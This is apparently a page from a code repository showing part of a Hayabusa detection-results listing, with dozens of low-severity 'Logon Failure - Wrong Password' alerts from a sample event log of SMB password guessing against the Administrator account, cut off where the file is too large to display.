13612016-09-20 01:50:20.619 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: xwfwZ0hXFaFwqymH | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13622016-09-20 01:50:20.657 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: QYlZwLsvrsuqUZ4q | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13632016-09-20 01:50:20.707 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: pvGrzr30eVl5TGhA | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13642016-09-20 01:50:20.791 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: tqdJcHWbdGcIIHBr | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13652016-09-20 01:50:20.840 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: YDt69bIJ1yI6PXLg | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13662016-09-20 01:50:20.879 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: WtE2uMuOe8QPAKOj | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13672016-09-20 01:50:20.911 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: BWQDlZDgFj9NmMhJ | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13682016-09-20 01:50:20.964 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: ncQiyLyHCXr8knGa | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13692016-09-20 01:50:21.021 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: XjVmLfmcPMYbmdin | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13702016-09-20 01:50:21.072 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: gU2HjzjDxHsnvENI | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13712016-09-20 01:50:21.103 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: cUPn5CEz2LtwRwvZ | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13722016-09-20 01:50:21.140 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: hCz069oBFXqpshbU | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13732016-09-20 01:50:21.187 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: dzhc9PVRVP69tshD | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13742016-09-20 01:50:21.226 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: ejA3ZNfKWEs8zAMX | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13752016-09-20 01:50:21.265 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: U5egiL2PGOrYCHv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13762016-09-20 01:50:21.302 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: YYhIM3zla6KcbKbM | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13772016-09-20 01:50:21.344 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: WjyQJnVBO4iC9Tkw | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13782016-09-20 01:50:21.387 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: g6Tpp8TRa2nRxHzo | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13792016-09-20 01:50:21.422 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: DyLvo5Bn2HzyANdH | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13802016-09-20 01:50:21.465 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: NaXNThuZDGqJ7oCP | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13812016-09-20 01:50:21.505 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 42Sb7p19cQsEV30b | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13822016-09-20 01:50:21.540 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: An6629wgflzSgqY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13832016-09-20 01:50:21.584 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: iO7JktEihqddmEtv | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13842016-09-20 01:50:21.624 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: nG97BFOgKxnZaqi4 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13852016-09-20 01:50:21.668 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: SH2D24c6nRGDL4Oe | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13862016-09-20 01:50:21.712 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: uiu2yfaM2JQQZoLF | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13872016-09-20 01:50:21.745 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: YQx9PG8DtR2tMjvS | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13882016-09-20 01:50:21.792 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: OoAWryajKhLD7RyY | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13892016-09-20 01:50:21.836 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: PgewSeaVugP1TXss | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13902016-09-20 01:50:21.911 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: sPMCPdCAnz4upz8X | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13912016-09-20 01:50:21.956 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: dUbV6xnGeBWE8Dif | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13922016-09-20 01:50:22.001 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: dIJ9mZczFO1GKItV | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13932016-09-20 01:50:22.044 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: wW0vxE4o68L70Sra | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13942016-09-20 01:50:22.085 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: upOn9DzB1yWtntyX | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13952016-09-20 01:50:22.116 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: m9uGgocAVReiJWDm | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13962016-09-20 01:50:22.153 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: qm9Jf1fles2HOb3g | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13972016-09-20 01:50:22.193 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Ev5eTWdf3CskOMuh | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13982016-09-20 01:50:22.223 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: QoiMO6sSLOm4fOD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13992016-09-20 01:50:22.256 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: xDjvMsa2IgR9KO7l | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14002016-09-20 01:50:22.293 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: SR7gVjxHZDYeK7pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14012016-09-20 01:50:22.323 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 4jzGAepr7JeNKuuk | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14022016-09-20 01:50:22.368 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: H9baxEeRCWjx6Fzr | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14032016-09-20 01:50:22.405 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Uy7aTt0B4ErguacA | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14042016-09-20 01:50:22.431 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: nvKcLrUXqu2vTKO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14052016-09-20 01:50:22.486 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: PLycXLeAU21pdnXL | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14062016-09-20 01:50:22.527 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: SgwjJSKOPnurDWW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14072016-09-20 01:50:22.564 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: YPDYdxPoQAl8aGMs | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14082016-09-20 01:50:22.594 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: CX8knunlT6SMpmQw | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14092016-09-20 01:50:22.632 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: AAjYbt50leZt3Xve | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14102016-09-20 01:50:22.677 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 3CD0HUCdg4UWOiji | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14112016-09-20 01:50:22.709 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: dkeWmTE1R1rYaYP8 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14122016-09-20 01:50:22.744 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: W87qcfSj4qWWUv4k | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14132016-09-20 01:50:22.830 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: WUCyUQgbUqwaLj3J | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14142016-09-20 01:50:22.877 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Q9nLhDbcvmVBZp4f | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14152016-09-20 01:50:22.925 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: BBWo1zDdjaAeGDWW | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14162016-09-20 01:50:22.960 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: vjHRFk2flmzzd1zg | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14172016-09-20 01:50:23.000 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 53HYxs9s7fpP1y6V | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14182016-09-20 01:50:23.035 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: tluqXKvVooP7VNyB | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14192016-09-20 01:50:23.076 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 43m0nfi5tiv4TpSB | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14202016-09-20 01:50:23.107 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: qjPyJXl984vViV6L | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14212016-09-20 01:50:23.143 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: MomQ8Yt51VsMiO4p | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14222016-09-20 01:50:23.175 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: LJYCi5r2otMHxA8f | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14232016-09-20 01:50:23.211 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 4oUSkMBI8SGDLwYC | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14242016-09-20 01:50:23.251 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: j1x3lyRjxn73KITB | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14252016-09-20 01:50:23.283 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: gh05BhGpwq1ho62a | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14262016-09-20 01:50:23.324 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: bxj6ITbiciyRNLbF | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14272016-09-20 01:50:23.370 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Uev2mjCaqHjm6NYi | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14282016-09-20 01:50:23.415 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: L4WU383o9E5JyM5V | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14292016-09-20 01:50:23.450 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: lfMv0lsoiRnTCFXe | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14302016-09-20 01:50:23.504 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: XL4ahBqUyGeTONkE | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14312016-09-20 01:50:23.549 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 8hJ888Kmyi6KqIPn | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14322016-09-20 01:50:23.596 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: VZ6sfYMHuygnMdY2 | IP Addr: 192.168.198.149 |
The file is too large to be shown. View Raw
Reference in New Issue View Git Blame Copy Permalink